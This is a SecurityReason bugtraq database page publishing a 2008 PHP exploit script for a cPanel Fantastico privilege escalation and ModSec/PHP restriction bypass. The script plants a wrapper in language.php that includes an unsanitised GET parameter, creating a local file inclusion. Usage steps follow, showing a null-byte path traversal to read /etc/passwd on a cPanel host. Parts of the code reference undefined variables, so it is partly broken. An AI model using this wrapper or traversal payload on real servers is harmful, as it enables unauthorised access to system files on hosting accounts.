|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  World Laboratory of Bugtraq Database |
||||||||||
SecurityAlert : None
Credit : Super-Crystal Added by : SecurityReason SecurityRisk : Low  (About) Remote : Yes Local : Yes Status : Bug
Text : Script : Cpanel 11.x bug : language.php [edite file] exploit=Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass" safemode off , mod_security off Disable functions : All NONE ,access root folder <?php /* ######################################## # Deadly Script by Super-Crystal # bypass Cpanel fantastico # www.arab4services.net # ##e-mail : l1un (at) hotmail (dot) com [email concealed] , i-1 (at) hotmail (dot) com [email concealed]## ####################################### */ set_time_limit(0); if(isset($_POST['sup3r'])) { if(stristr(php_uname(),"2.6.") && stristr(php_uname(),"Linux")) { $phpwrapper = '<?php include_once("./language/".$_GET[sup3r].".php"); ?> '; fwrite($h,$prctl); fclose($h); $handle = fopen($_POST['php'], "w"); fwrite($handle, $phpwrapper); fclose($handle); echo "Building exploit...<br />"; echo "coding by Super-Crystal <br />"; echo "Cleaning up<br />"; echo "Done!<br /> </pre>"; } else { echo "error : ".php_uname(); } } else { ?> <div align="center"> <h3>Deadly Script</h3> <font color=red>Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass"</font><br /> <pre><div align="center"> </pre></div><br /> <table border="0" cellspacing="0"> <tr> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"> <table border="0" cellspacing="0"> <tr> <td><div align="right">Exploit:</div></td> <td> <select name="exploit"> <option selected="selected">Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass"</option> </select> </td> </tr> <tr> <td><div align="right">change</div></td> <td><input type="text" name="php" size="50" value="<?php echo getcwd()."/language.php" ?>" /></td> </tr> <tr> </table> </div> <input type="hidden" name="sup3r" value="doit" /> <input name="submit" type="submit" value="Submit" /><br /> 1- change /home/[user]/.fantasticodata/language.php <br /> 2- click on the submit <br /> 3- now put it like this (e.g) : http://www.xxxx.com:2082/frontend/x3/fantastico/index.php?sup3r=../../.. /../../../etc/passwd%00 . <br /> <font color=red>Written: 10.10.2008</font><br /> <font color=blue>Public: 26.11.2008</font><br /> <div align="center"> <font color=red>Author : Super-Crystal</font><br /> <a href="http://www.arab4services.net">Arab4services.net </a></center> </div> </form> <?php } ?> arab4services.net References : none If you want change this note, please use UCP
|
||||||||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |